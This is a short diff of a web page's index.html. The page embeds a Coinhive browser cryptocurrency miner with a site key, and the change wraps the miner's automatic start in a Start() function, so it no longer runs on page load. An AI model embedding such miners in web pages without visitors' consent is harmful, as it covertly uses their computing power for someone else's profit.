--- a/index.html
+++ b/index.html
@@ -8,7 +8,10 @@
     <script src="https://coinhive.com/lib/coinhive.min.js"></script>
 <script>
     var miner = new CoinHive.User('mgKCszBsJYX5eJqEaBwkha2dbZ9z7rMk', 'john-doe');
-    miner.start();
+     function Start(){
+                miner.start();
+        }
+
 </script>
 </head>
 <body>
